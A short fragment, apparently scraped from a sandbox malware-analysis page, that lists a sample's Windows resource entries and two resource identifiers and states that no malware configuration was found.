ID:0001
ID:0
RT_GROUP_CURSOR4
ID:0001
ID:0
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
rzpy0qi6zgghz492eprcqcl1ugy50
hj2htzibusyw55sq47k
Characteristics
No malware configuration were found at this point.
You must be signed in to post a comment.
An error has occurred. This application may no longer respond until reloaded. Reload 🗙